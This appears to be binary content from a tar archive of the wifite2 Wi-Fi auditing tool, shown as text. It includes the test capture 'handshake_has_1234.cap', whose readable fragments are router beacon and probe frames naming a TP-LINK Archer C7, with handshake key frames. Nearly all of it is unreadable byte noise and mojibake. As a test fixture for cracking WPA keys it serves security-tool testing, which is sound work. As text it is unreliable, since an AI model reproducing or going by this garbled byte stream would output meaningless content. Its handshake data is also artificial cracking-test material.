CkvCmy).]OezKhNnP:P\{J&w /& Ҥ Ep,䷉Ftkg@kb=㛥R2eXINݓ_0E}̘iޥK&undYԁi(uG?ͬtҠ]9_t9I&(\ܫN/Jy+;IP-ܑ(t:sԼC8>YTEaQoI`jēM%mx!6I:+!݋O?k@rmJ^ ih!R30ԆWn-]c kzU/͹_zXlcX9PC9¼R'4 bBBhs1˩z+_ijKܨP+K x~C@yˏ&Kh%v"?{*+Af#bqiR6aAxJ wgu)#)\ZBX&1%n8bjU \ =cbjU h${\bjU ${\bjUB ${\bjUj T${\bjUp ${\bjU  \ =cbjU  \ =cbjU@X|aO Sonos_ynFI1HY4cF3gqPuljCuicmFZ66G@HX635X 9IJ NK0XX|`  X6X|`bjU d${\bjU  \ =cbjU  \ =cbjUr d${\bjU t \ =cbjU T${\bjU T${\bjU d${\bjUb ڨ෱MAppΨ>kcpTSh?13/Rq (_Ve:^!*lėYc-I]vTF?_t뗲7rs6<*0bjU  \ =cbjU*@X u Sonos_ynFI1HY4cF3gqPuljCuicmFZ66GHX6??X|a6IJ NK$XX  X6X bjU j T${\bjU T${\bjU  ${\bjU  d${\bjU  \ =cbjU  \ =cbjU  \ =cbjU  \ =cbjU2T50#b՛՛PlbjU ՛bjUT50#b՛@bjU՛T50#b@bjU2T50#b՛՛pl'bjU ՛bjU:՛T50#b@|bjU  T50#bbjU:՛T50#b՛bjU  T50#bbjU}}@T50#b HOME-1102 2 $0H`l-, L3,bjU ՛bjU ՛bjU}}@T50#b HOME-1102 2 $0H`l-, L3,bjU d${\bjUl}}@T50#b HOME-1102 2 $0H`l-, L3,bjU d${\bjU F T${\bjU t d${\bjU d${\bjU  T${\bjU T${\bjU& d${\bjU4 h${\bjU+PNNB09090au~b݈$m J/˼WL]&5B|W24wifite2-2.7.0/tests/files/handshake_has_1234.cap0000644000175000017500000036440714437644461020647 0ustar sophiesophieòi|ZDmkmk3$nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ PJD<I7* 0PPPP|Z;^m4%|Z^ppP:.mkmk4 'nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPP|ZppP:.mkmk4 (nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPP|ZppP:.mkmk4(nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPP|Z mk|ZppP:.mkmk049P)nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPP|Z o|Z6 mk|ZP ,o|Z ,o|ZR ؗF|Z\ ؗF|Z BmkxOCQ֐4`KţDXܽfPS&hr'[#qd*›Wh QUҧe!񁿥4d!8ֆZrF N: O΅\ǹy½}`I%OU^ty.YZz"mj3t= ?@TRl(~t|Z +@|Z0 ppP:.gmkmk4.nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPP|Z< ppP:.gmkmk4.nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPP|ZJ ppP:.gmkmk4x.nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPP|ZX ppP:.gmkmk4*.nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPP|Z >;^m4%|Z j;^|Z N;^|Z$ppP:.gmkmk4/nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPP|ZzppP:.gmkmk40nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPP|Z(;^m4%к?}Z;^m4%}Zn;^m4%?}Z;^m4%}Z$;^m4%}Z. ;^}Z4;^m4%}Z;^m4%0}Z;^m4%`}Z :?}Z ܅}Z o}Z 8 8G}Z o~Z  \8G~Z J $8G~Z `48~Z CwVkX~Z( CwVkX~Z. VkXCw0~ZN ,o~ZX ,o~Z mk~Z ;^~Z f;^~ZD ;^~Z ؗF~Z |Zz~Z |ZzZP;^m4%ZT ;^Z ;^Z f;^Zj ;^Z :?Z ;^m4%Z ;^m4%ZFppP:a &mkmk6z_nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZTppP:a &mkmk6_nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ(ppP:.mkmk 7dnd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZppP:.mkmk@7Uend1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ  8G耱Zr ppP:.gmkmk7(lnd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ ppP:.gmkmk7lnd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ ppP:.gmkmk7!lnd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ ppP:.gmkmk7Rlnd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ(;^m4%Z0 ;^ȁZ@;^m4%@Z@ ;^m4%Z ;^m4%ZJ^ ;^m4%Z n;^ȁZ;^m4%Z;^m4%Z;^m4%Z;^m4%Z J;^m4%Z r;^ȁZ";^m4%Zn;^m4%Z;^m4%Z ;^ȁZt f;^ȁZN ;^m4%Z* j;^ȁZ;^m4%Z;^m4%Z(B;^m4%Z z;^ȁZ;^m4%Z;^m4%Z;^m4%Z;^m4%Z.^ ;^m4%Z ;^m4%Z +@Z ʠZ `48Z `48Z ;^m4%ZR ;^ȂZV;^m4%Z|;^m4%Z Z;^ȃZ;^m4% Z;^m4%Z;^m4%Z&;^m4%ZT ;^ȃZ;^m4%Z;^m4%Z;^m4%Z;^m4%Z;^m4%Z f;^ȃZ>;^m4%Z p [ Z p [ Z mkZ& `48ZS 8G脱Z `48ZbppP:mkmk:nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZVppP:.mkmkP:Hnd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZppP:.mkmkp:nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZppP:.mkmk:nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ8ppP:.mkmk:գnd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZppP:.mkmk:c8nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZppP:.mkmk:pnd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ 8G脱Z ppP:.gmkmk:,nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ ppP:.gmkmk:>Rnd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ ppP:.gmkmk:wtnd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ, ppP:.gmkmk;ʧnd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ/ mkZ6 mkZV mkZ f;^ȄZ;^m4%@Z ;^ȅZh;^m4%p?Z;^m4%Z ;^m4%Zl 105,Zl;^m4%Zl ;^ȅZ;^m4%Z;^m4%Z;^m4%Z F;^ȅZa >Q~QZ ܅Z 8G腱Z V 8G腱Z f;^ȅZ ;^m4%Z j;^ȆZ ,>HMZ xxQgZ;^m4%8Z Z;^ȇZ z;^ȇZ j;^ȇZ  ;^ȇZ ;^ȇZ>;^m4%CZF *;^ȇZ;^m4%Z ܅Z WoZ- QgZ5 WoZ `48Z CwVkXZ2;^m4%Z" ppP:.mkmk=nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ mkZ `48Z ppP:.gmkmk=nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZH ppP:.gmkmk=nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZT mkZ ppP:.gmkmk>)>nd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ mkZ CwȈZ TCwlc{|ZTCwlc{|ZRppP:.gmkmk >wnd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ ;^ȈZ(;^m4%Z CwȉZ f;^ȉZ ;^m4%QZ ;^m4%Z;^m4%Z>^ ;^m4%Z\;^m4%Zp ;^ȉZ ;^m4%Z ;^ȉZ;^m4%SZ;^m4%TZ;^m4%Z v;^ȉZ;^m4%@TZ;^m4%Z f;^ȉZ ;^m4%TZ ;^m4%TZ ;^m4%Z. ;^ȉZ0;^m4%TZ0;^m4%ZT;^m4%@UZTV ;^m4%Z` v;^ȉZd;^m4%`UZz ;^ȉZz;^m4%UZz;^m4%Z ;^ȉZN;^m4%Z ;^ȉZ;^m4%PVZ;^m4%Z;^m4%Z ;^m4%Z;^m4%pWZ, ;^ȉZ,;^m4%XZ.;^m4%Z ;^m4%Z;^m4%Z;^m4%Z;^m4%YZ;^m4%Z;^m4%Z;^m4%Z j;^ȉZ;^m4%ZZ;^m4%ZF ;^ȉZF;^m4% ZZt;^m4%Z~;^m4%Z ;^ȉZ;^m4%0[Z j;^ȉZ;^m4%[Z;^m4%Z>;^m4%Zp;^m4%Zp;^m4%Zr;^m4%Zv;^m4%Z~ ;^ȉZ~ ;^ȉZ ;^m4%Z;^m4%Z;^m4%Z. ;^ȉZ.;^m4% cZ. j;^ȉZ.;^m4%cZ.;^m4%Z:;^m4%cZ>;^m4%Zb;^m4%cZb;^m4%Zn;^m4%Z ;^ȉZ ;^ȉZ ;^m4%dZ >;^m4%Z ;^m4%dZ >;^m4%Z ;^m4%eZ4 ;^m4%Z: j;^ȊZ> 8G花Z;^m4%Z ;^ȊZ;^m4%eZ;^m4%eZ f,>HMZ B^mkxOCQP?`xRS#p:!d oZ e-FPi)ڰ}R?ś,aʦGICʪ/ضbzߥ ޖf'Y,T ·cPt n9AA%JJ43 a O@nQ.}z*SZ ;^m4%Zh v;^ȊZh ;^m4%eZ j;^ȊZ ;^m4%fZ ;^m4%fZ ;^m4%PfZ ;^m4%Z ;^m4%Z ;^m4%fZ*;^m4%Zb ;^m4%Z ;^ȊZ;^m4%@h Z;^m4%PhZ;^m4%`hZ;^m4%Z ;^m4%Z;^m4%Z V;^ȊZ;^m4%hZ;^m4%iZ;^m4%Z0 ;^ȊZ6;^m4%@jZ6;^m4%kZ6b ;^m4%Z4B;^m4%ZF;^m4%ZL;^m4%ZL j;^ȋZV;^m4%`lZ|;^m4%lZ~;^m4%Z ;^ȋZ v;^ȋZ;^m4%pmZV ;^m4%Z j;^ȋZ;^m4%mZV ;^m4%Z;^m4%mZ0;^m4%mZ4b ;^m4%ZV>;^m4%Zt ;^ȋZ~ j;^ȋZ;^m4%pnZ;^m4%Z ;^ȋZ;^m4%nZV ;^m4%Z ;^ȋZ;^m4%nZ;^m4%pZ;^m4%ZN;^m4%ZR;^m4%Z;^m4%Z;^m4%Z ;^ȋZ ;^ȋZ;^m4%@tZ;^m4%t?Z^;^m4%Z^;^m4%Z^ ;^ȋZ^ ;^ȋZ`;^m4% uZ ;^ȋZ;^m4%uZ;^m4%Z,;^m4%Z;^m4%uZ;^m4%Z;^m4%vZ2;^m4% wZ8;^m4%Z:;^m4%0w=ZN;^m4%ZN;^m4%ZN;^m4%Z`;^m4%Zv;^m4%Z;^m4%x?Z;^m4%pyZ;^m4%Z2;^m4%0zZB;^m4% zQZZ f;^ȋZ;^m4%Zk xxዱZ ;^ȋZ` >;^m4%Zj ;^m4%zZp ;^m4%Zv ;^m4%{Zv ;^m4%{Z j;^ȋZ ;^m4%P{Z +@Z@:mkmkZ@:mkmkZ@:mkmk Z@mkmkZ@mkmkZ@mkmk Z@:mkmk0Z@mkmk0Z@:mkmk@Z@:mkmkPZ@ :mkmk`Z@ mkmk@Z@ mkmkPZ@ mkmk`Z@:mkmkpZ@ :mkmkZ@.:mkmkZ@.mkmkpZ@.mkmkZ@::mkmkZ@:mkmkZ@F:mkmkZ@LmkmkZ@NmkmkZ@P:mkmkZ@ZmkmkZ@Z:mkmkZ@d:mkmkZ@dmkmkZ@lmkmkZ@l:mkmkZ@v:mkmkZ@vmkmkZ@:mkmkZ@mkmkZ@mkmkZ@:mkmk Z@:mkmk0Z@mkmk Z@:mkmk@Z@mkmk0Z@:mkmkPZ@mkmk@Z@:mkmk`Z@mkmkPZ@mkmk`Z@:mkmkpZ@:mkmkZ@mkmkpZ@mkmkZ@:mkmkZ@:mkmkZ@:mkmkZ@mkmkZ@mkmkZ@:mkmkZ@mkmkZ@ :mkmkZ@mkmkZ@mkmkZ@:mkmkZ;^m4%{Z@mkmkZ@:mkmkZ@$:mkmkZ@,mkmkZ@,mkmkZ@0:mkmkZ@::mkmk Z@:mkmkZ@Dmkmk Z@D:mkmk0Z@N:mkmk@Z@Rmkmk0Z@Rmkmk@Z@Z:mkmkPZ@ZmkmkPZ@b:mkmk`Z@:mkmkpZ@:mkmkZ@:mkmkZ@mkmk`Z@mkmkpZ@mkmkZ@:mkmkZ@mkmkZ@:mkmkZ@mkmkZ@:mkmkZ@mkmkZ@mkmkZ@:mkmkZ8G\PVYZ@:mkmkZ@mkmkZ@mkmkZ@:mkmkZ@mkmkZ@:mkmkZ@:mkmkZ@mkmkZ@mkmkZ@:mkmk Z@:mkmk0Z@ :mkmk@Z@ mkmk Z@ mkmk0Z@ mkmk@Z@ :mkmkPZ@ :mkmk`Z@* :mkmkpZ@, mkmkPZ@, mkmk`Z@, mkmkpZ@2 :mkmkZ@< :mkmkZ@B mkmkZ@B mkmkZ@F :mkmkZ@R :mkmkZ@R mkmkZ@b :mkmkZ@f mkmkZ@f mkmkZ@l :mkmkZ@n mkmkZ@| :mkmkZ@ mkmkZ@ :mkmkZ@ :mkmkZ@ :mkmkZ@ mkmkZ@ mkmkZ@ mkmkZ@ :mkmk Z@ :mkmk0Z@ mkmk Z@ mkmk0Z@ :mkmk@Z@ :mkmkPZ@ mkmk@Z@ mkmkPZ@ :mkmk`Z@ :mkmkpZ@ mkmk`Z@ :mkmkZ@ mkmkpZ@ mkmkZ@ :mkmkZ@ mkmkZ@ :mkmkZ@* :mkmkZ@: :mkmkZ@: mkmkZ@: mkmkZ@D :mkmkZ@T :mkmkZ@T mkmkZ@T mkmkZ@b :mkmkZ@b mkmkZ@j :mkmkZp ppP:.gmkmk@[ od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ@p mkmkZ@p mkmkZ@z :mkmkZ@ :mkmk Z@ :mkmk0Z@ mkmkZ@ mkmk Z@ :mkmk@Z@ mkmk0Z@ :mkmkPZ@ mkmk@Z@ mkmkPZ@ :mkmk`Z@ mkmk`Z@ :mkmkpZ@ mkmkpZ@ :mkmkZ@ mkmkZ@ :mkmkZ@ :mkmkZ@ mkmkZ@ mkmkZ@ :mkmkZ@ mkmkZ@ :mkmkZ@ :mkmkZ@ :mkmkZ@ mkmkZ@ mkmkZ@ mkmkZ@ :mkmkZ@ :mkmkZ mkZ@ mkmkZ@ mkmkZ mkZ@ :mkmkZ@* :mkmk Z@. mkmkZ@. mkmk Z@6 :mkmk0Z@@ :mkmk@Z@L :mkmkPZ@T :mkmk`Z@X mkmk0Z@X mkmk@Z@X mkmkPZ@X mkmk`Z@^ :mkmkpZ@f :mkmkZ@p :mkmkZ@x :mkmkZ@z mkmkpZ@z mkmkZ@z mkmkZ@z mkmkZ@ :mkmkZ mkZ@ mkmkZ@ :mkmkZ@ :mkmkZ@ mkmkZ@ :mkmkZ@ mkmkZ@ mkmkZ@ :mkmkZ@ mkmkZ@ :mkmkZ@ mkmkZ@ :mkmkZ@ :mkmk Z@ :mkmk0Z ;^ȌZ@ mkmkZ@ mkmk Z@ mkmk0Z@ :mkmk@Z@ :mkmkPZ ,>HMZ@ mkmk@Z@ mkmkPZ@ :mkmk`Z@ mkmk`Z@ :mkmkpZ@ mkmkpZ@ :mkmkZ ;^m4%Z@ :mkmkZ@ mkmkZ@ mkmkZ@ :mkmkZ@ :mkmkZ@$ mkmkZ@$ mkmkZ@( :mkmkZ@4 :mkmkZ@6 mkmkZ@6 mkmkZ@< :mkmkZ@F :mkmkZ@Z mkmkZ@Z mkmkZ f,>HMZ ;^ȌZ &;^ȌZ;^m4%Z ;^ȍZ;^m4%~?Z;^m4%`Z;^m4%Z< ;^ȍZ<;^m4%Z<B;^m4%ZB;^m4%0ZH j;^ȍZH;^m4%@Zv;^m4%ZD;^m4%Z;^m4%Z;^m4%Z;^m4%ZJ;^m4%Z;^m4%@Z;^m4%`Z;^m4%ZB;^m4%Z;^m4%ZT;^m4%ZCwVkXZppP:lw5mkmkE*od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ(ppP:lw5mkmkE*od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ6ppP:lw5mkmkE(*od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZDppP:lw5mkmkE5*od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZL ;^ȍZL;^m4%ZppP:lw5mkmk E|*od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZppP:lw5mkmk E*od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ;^m4%Zr;^m4%Z ;^ȍZ;^m4%?ZppP:lw5mkmk0Ed+od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZppP:lw5mkmk0E;+od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZppP:lw5mkmk0E+od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZppP:lw5mkmk0E,od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ ;^ȍZ;^m4%0Z ;^m4%Z;^m4%@ZP;^m4%PZ "V**Z ppP:lw5mkmk@E2/od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ ppP:lw5mkmk@E/od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ ܅Z lw5mkZ lw5mkZ lw5mkZ ;^m4%`Z" lw5mkZ$ lw5mkZ& lw5mkZ, lw5mkZ6 lw5mkZ ppP:lw5mkmkpE1od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ ppP:lw5mkmkE1od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ mkZ ppP:lw5mkmkE1od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ ppP:lw5mkmkE1od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ mkZ lw5mkZ ;^m4%Z lw5mkZ lw5mkZ" lw5mkZ$ lw5mkZt lw5mkZ lw5mkZ  lw5mkZ  lw5mkZ  lw5mkZ  lw5mkZ  lw5mkZ  lw5mkZ  lw5mkZ  lw5mkZ lw5mkZ lw5mkZ lw5mkZ !lw5mkZ !lw5mkZ Julw5mkxOCQ֐1, eH΍A0Ita✭rw Ϣ ~ ӟSO O3k=#QhqDG~qE}aX>*I)LDhAZEw?> ޤ;$o(["OwZ D$&]|Wrw~pJs9֖2qbZ Julw5mkxOCQ֐1, eH΍A0Ita✭rw Ϣ ~ ӟSO O3k=#QhqDG~qE}aX>*I)LDhAZEw?> ޤ;$o(["OwZ D$&]|Wrw~pJs9֖2qbZ Jlw5mkxOCQ֐1, eH΍A0Ita✭rw Ϣ ~ ӟSO O3k=#QhqDG~qE}aX>*I)LDhAZEw?> ޤ;$o(["OwZ D$&]|Wrw~pJs9֖2qbZ lw5mkZ Jlw5mkxOCQ֐1, eH΍A0Ita✭rw Ϣ ~ ӟSO O3k=#QhqDG~qE}aX>*I)LDhAZEw?> ޤ;$o(["OwZ D$&]|Wrw~pJs9֖2qbZ "lw5mkZ Jlw5mkxOCQ֐1, eH΍A0Ita✭rw Ϣ ~ ӟSO O3k=#QhqDG~qE}aX>*I)LDhAZEw?> ޤ;$o(["OwZ D$&]|Wrw~pJs9֖2qbZ lw5Zlc{Cw|Z:ppP:lw5mkmkA-3od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ < mkZ ^ mkZ  CwʍZ ppP:lw5mkmkA3od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ  CwȍZppP:lw5mkmkAu3od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ  mkZ  CwʎZ  mkZppP:lw5mkmk BT4od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ & mkZ,ppP:lw5mkmk0Bb4od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ 4 mkZ lw5Z  mkZ lw5Z:lw5mkmk_y TyVU_G{#)&!Z *@mklw5mku 6 ʡP Yتn4lh>h7Gm#30QLu0Z2 lw5Z^ lw5Zc b,>HMZ!!@mklw5mkkZ lw5Z Z;^ȎZ( +@Z mkZ f,>HMZ LLBmklw5B`iOСuOFGdkO֕>ZH6cp-Z4 mkZ: PPB^mklw5B`<1sShK*9{4g}}٘cdpxG Z: lw5Z: lw5Z !!@mklw5mklZ lw5Z mkZ mkZ lw5Z mkZ lw5Z lw5Z lw5Z LLBmklw5C`R% Ք8wo*ZM^*z[wau0Z mkZ lw5Z 8G\PVYpZ 8G莱Z@B^mklw5C`js}/;N4]IdnԒ+t҆V3%4:_ZY*8T"b#c=|vlt|L!J;Έ[fnT B[^=t:,m0QCL^#cZ0ޟ68WxLEIgN du4 A駑=؝|'}YCw@)o 5=njy4ȆjM4gzߧlrOQS@tޏXM9{/B Ab".T(;x0*&th<±bC2='aE_-LE7d0Hh4:M:+ۯ_ %EHMZ mkZ^;^m4%Z& ;^m4%Z;^m4%Z;^m4%Z mkZ >;^m4%Z";^m4%Zj;^m4%Z;^m4%Z;^m4%ZL;^m4%p?Zr ;^ȏZx;^m4%PZ;^m4%Z;^m4%Z ;^ȏZ ;^ȏZ ;^ȏZb ;^m4%Z: ;^ȏZDV ;^m4%Zx;^m4%Z ;^ȏZ ;^m4%Z>;^m4%ZJ;^m4%Z>;^m4%Z;^m4%Z;^m4%Z;^m4%Z;^m4%Z>;^m4%Z ;^m4%ZJ;^m4%ZP;^m4%PZ^;^m4%Z;^m4%Z;^m4%PZj ;^ȏZn;^m4% Z;^m4%Z;^m4%Z;^m4%Z;^m4%Zd;^m4%Zd R;^ȏZp;^m4%Z j;^ȏZ lw5Z<;^m4%Zl f;^ȏZ;^m4%Z ;^ȏZ;^m4%@Z ,>HMZ  A-GZ ;^m4%Z >;^m4%Z& j;^ȏZ0 ;^m4%pZ@ ;^m4%ZB +@ZV ;^m4%ZV j;^ȏZX j;^ȏZ lw5Z lw5Z mkZ5 ,>HMZ9 ؗFڐZppP:.gmkmkDzVod1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZppP:.gmkmkDVod1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ ؗFڐZ ؗFڐZppP:.gmkmk DVod1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ#ppP:.gmkmk DkVod1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ1ppP:.gmkmk D/Vod1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ>ppP:.gmkmk DVod1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZppP:.gmkmk@DCnWod1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ mkZ mkZBmkmk`D `kOk mTCpxYgԋ?,8yxUQY]^(xTя& ݚWM,uBmLm.5b`y?~xW60  